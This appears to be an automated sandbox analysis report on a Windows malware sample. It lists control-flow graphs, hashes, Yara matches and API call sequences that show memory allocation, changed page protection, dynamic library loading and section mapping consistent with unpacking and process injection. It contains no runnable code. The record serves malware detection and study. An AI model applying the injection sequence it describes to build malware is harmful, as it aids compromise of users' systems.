                                                                              • Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
                                                                              • String ID: k`$}$
                                                                              • API String ID: 2183200751-956986773
                                                                              • Opcode ID: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
                                                                              • Instruction ID: ac660437b8637ef0f9ec563d52a15bda1912d96670292318996d42c4d9e3d472
                                                                              • Opcode Fuzzy Hash: d5ce5a5fcc1c851620d070e0cac741e21c9d104fc792eb926722b7ac6ebd6bb2
                                                                              • Instruction Fuzzy Hash: DF91F371C46528ABC721AB65EC48ADF7B78EF49351F01806EF509A7150CB381A86CFED

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 70 2b7003c-2b70047 71 2b7004c-2b70263 call 2b70a3f call 2b70e0f call 2b70d90 VirtualAlloc 70->71 72 2b70049 70->72 87 2b70265-2b70289 call 2b70a69 71->87 88 2b7028b-2b70292 71->88 72->71 93 2b702ce-2b703c2 VirtualProtect call 2b70cce call 2b70ce7 87->93 90 2b702a1-2b702b0 88->90 92 2b702b2-2b702cc 90->92 90->93 92->90 99 2b703d1-2b703e0 93->99 100 2b703e2-2b70437 call 2b70ce7 99->100 101 2b70439-2b704b8 VirtualFree 99->101 100->99 103 2b705f4-2b705fe 101->103 104 2b704be-2b704cd 101->104 107 2b70604-2b7060d 103->107 108 2b7077f-2b70789 103->108 106 2b704d3-2b704dd 104->106 106->103 110 2b704e3-2b70505 106->110 107->108 113 2b70613-2b70637 107->113 111 2b707a6-2b707b0 108->111 112 2b7078b-2b707a3 108->112 121 2b70517-2b70520 110->121 122 2b70507-2b70515 110->122 114 2b707b6-2b707cb 111->114 115 2b7086e-2b708be LoadLibraryA 111->115 112->111 116 2b7063e-2b70648 113->116 118 2b707d2-2b707d5 114->118 120 2b708c7-2b708f9 115->120 116->108 119 2b7064e-2b7065a 116->119 123 2b707d7-2b707e0 118->123 124 2b70824-2b70833 118->124 119->108 125 2b70660-2b7066a 119->125 126 2b70902-2b7091d 120->126 127 2b708fb-2b70901 120->127 128 2b70526-2b70547 121->128 122->128 129 2b707e4-2b70822 123->129 130 2b707e2 123->130 132 2b70839-2b7083c 124->132 131 2b7067a-2b70689 125->131 127->126 133 2b7054d-2b70550 128->133 129->118 130->124 134 2b70750-2b7077a 131->134 135 2b7068f-2b706b2 131->135 132->115 136 2b7083e-2b70847 132->136 142 2b70556-2b7056b 133->142 143 2b705e0-2b705ef 133->143 134->116 137 2b706b4-2b706ed 135->137 138 2b706ef-2b706fc 135->138 139 2b7084b-2b7086c 136->139 140 2b70849 136->140 137->138 144 2b706fe-2b70748 138->144 145 2b7074b 138->145 139->132 140->115 146 2b7056f-2b7057a 142->146 147 2b7056d 142->147 143->106 144->145 145->131 150 2b7057c-2b70599 146->150 151 2b7059b-2b705bb 146->151 147->143 154 2b705bd-2b705db 150->154 151->154 154->133
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02B7024D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b70000_scjabht.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID: cess$kernel32.dll
                                                                              • API String ID: 4275171209-1230238691
                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                              • Instruction ID: 6718812b52abe0641362ebbcc5b0e69383259bb58732ae1b3e100e543b30e802
                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                              • Instruction Fuzzy Hash: 70527A74A01229DFDB64CF58C984BACBBB1BF09304F1484DAE95DAB351DB30AA85DF14

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 372 4178e3-4178ea 373 4178f0-417900 372->373 374 417902 373->374 375 417908-41790b 373->375 374->375 375->373 376 41790d-41792e LoadLibraryA call 417290 call 417580 375->376 381 417930-417937 376->381 382 417943-417949 381->382 383 417939-41793f 381->383 384 417950-417957 382->384 385 41794b call 417280 382->385 383->382 388 417966-41796d 384->388 389 417959-417960 InterlockedDecrement 384->389 385->384 388->381 390 41796f-41797f 388->390 389->388 391 417980-417990 390->391 392 417992 391->392 393 417999-41799c 391->393 392->393 393->391 394 41799e-4179a9 393->394 395 4179b0-4179b5 394->395 396 4179b7-4179bd 395->396 397 4179bf-4179c5 395->397 396->397 398 4179c7-4179d4 396->398 397->395 397->398
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(004193F8), ref: 00417912
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00417960
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: DecrementInterlockedLibraryLoad
                                                                              • String ID: k`$}$
                                                                              • API String ID: 1728580480-956986773
                                                                              • Opcode ID: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
                                                                              • Instruction ID: 134cc60ee6fbcd4284a2d3b71c5bd9fcb84d361ebfdf38d762708a44da6be8e6
                                                                              • Opcode Fuzzy Hash: 3003b45fd1169c669f61d0907577ac23474fafbff37243fa5960b7ee75e7cf2e
                                                                              • Instruction Fuzzy Hash: EE2136B0D982158BDB309B24D8817EA7730EB49321F11447FD98997281CA3C58C9CB9D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 400 417290-4173d0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(02B1AF70), ref: 0041736F
                                                                              • GetProcAddress.KERNEL32(00000000,0041CF58), ref: 004173AC
                                                                              • VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 004173CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 2099061454-3916222277
                                                                              • Opcode ID: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                              • Instruction ID: 6495229f78f8176a921cc79dd6658c6ebdac2eeea773cb5c0c066b47575b63c9
                                                                              • Opcode Fuzzy Hash: c1a1c5f81c7b3fa9d715df135f2c4534b827a19e895be0546727b526fadbbeb5
                                                                              • Instruction Fuzzy Hash: 62313E559C93C4CAE301CBB8FC447553B639B29744F5484689148CB3E2D7BA252AC76E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 418 2da0d30-2da0d49 419 2da0d4b-2da0d4d 418->419 420 2da0d4f 419->420 421 2da0d54-2da0d60 CreateToolhelp32Snapshot 419->421 420->421 422 2da0d62-2da0d68 421->422 423 2da0d70-2da0d7d Module32First 421->423 422->423 429 2da0d6a-2da0d6e 422->429 424 2da0d7f-2da0d80 call 2da09ef 423->424 425 2da0d86-2da0d8e 423->425 430 2da0d85 424->430 429->419 429->423 430->425
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DA0D58
                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02DA0D78
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2d9d000_scjabht.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 3833638111-0
                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction ID: 5cc67af040d2298fcc91355d378f541c51f2bbbe39d0bb846c388fac1c9e3fe1
                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                              • Instruction Fuzzy Hash: E1F09632500710AFEB203BF5989DF6E76E8AF4962AF140629E646915C0DB71FC458A61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 431 2b70e0f-2b70e24 SetErrorMode * 2 432 2b70e26 431->432 433 2b70e2b-2b70e2c 431->433 432->433
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02B70223,?,?), ref: 02B70E19
                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02B70223,?,?), ref: 02B70E1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2b70000_scjabht.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                              • Instruction ID: eea91c0eaf36b4b8d311b86b6cee36175ef086932f7dda50fde56889cc09c694
                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                              • Instruction Fuzzy Hash: 08D0123154512877D7003A94DC09BCD7B1CDF09B66F008451FB0DD9080C770964046E5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 434 4018e6-40194b call 401193 Sleep call 40141f 448 40195a-4019a5 call 401193 434->448 449 40194d-401955 call 401514 434->449 449->448
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 463 401915-401918 464 4018c6-4018c7 463->464 465 40191a-40194b call 401193 Sleep call 40141f 463->465 466 4018d7 464->466 467 4018ce-4018e3 call 401193 464->467 477 40195a-4019a5 call 401193 465->477 478 40194d-401955 call 401514 465->478 466->467 478->477
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 492 4018f1-40194b call 401193 Sleep call 40141f 502 40195a-4019a5 call 401193 492->502 503 40194d-401955 call 401514 492->503 503->502
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                              APIs
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DA0A40
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D9D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_2d9d000_scjabht.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                              • Instruction ID: c5b8d063a1978eba9eacb932917b2d030cc9338f3e11a04e099c3e67b52fc69b
                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                              • Instruction Fuzzy Hash: EF112879A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D371EA90DF90
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040968382.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_400000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                              • String ID:
                                                                              • API String ID: 1885482327-0
                                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                              APIs
                                                                              • LocalAlloc.KERNELBASE(00000000,02B1AF6C,004178C4), ref: 00417268
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: AllocLocal
                                                                              • String ID:
                                                                              • API String ID: 3494564517-0
                                                                              • Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                              • Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
                                                                              • Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
                                                                              • Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10
                                                                              APIs
                                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 00417491
                                                                              • WritePrivateProfileStringA.KERNEL32(00419398,00419374,0041934C,0041933C), ref: 004174B5
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004174BD
                                                                              • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004174FD
                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00417511
                                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041751F
                                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004193C0), ref: 0041752E
                                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041753F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                                              • String ID: -
                                                                              • API String ID: 113859268-2547889144
                                                                              • Opcode ID: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
                                                                              • Instruction ID: a463e9529dcf8072e3b7220abe1072026f108712342e539d7c254fb5de8a9354
                                                                              • Opcode Fuzzy Hash: af8605d0b3a4fb53b992738fe7becc4eb360322e70412ad4efd0eb029d8f9bbd
                                                                              • Instruction Fuzzy Hash: 7A21D830A8430CABE7209F60DC85FDD7F70EB0C755F1181AAF749AA1C0CAB41AC88B59
                                                                              APIs
                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 004175B4
                                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004175CF
                                                                              • HeapDestroy.KERNEL32(00000000), ref: 004175EE
                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004175FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2040991261.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_40b000_scjabht.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                              • String ID:
                                                                              • API String ID: 4159173863-0
                                                                              • Opcode ID: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
                                                                              • Instruction ID: 3d7b8869d9909e6524e9da05564ce57d4bd3bf1de3f4668ec111e10b9b533a75
                                                                              • Opcode Fuzzy Hash: a70025092311ae8c4b0cb20251c783b4c81ae9268d6ec19b84262a1c22d03a33
                                                                              • Instruction Fuzzy Hash: 4701D4B1A441089BD750EB64ED85BEA37B8EB0C746F41402AF709A7281DF742944CF59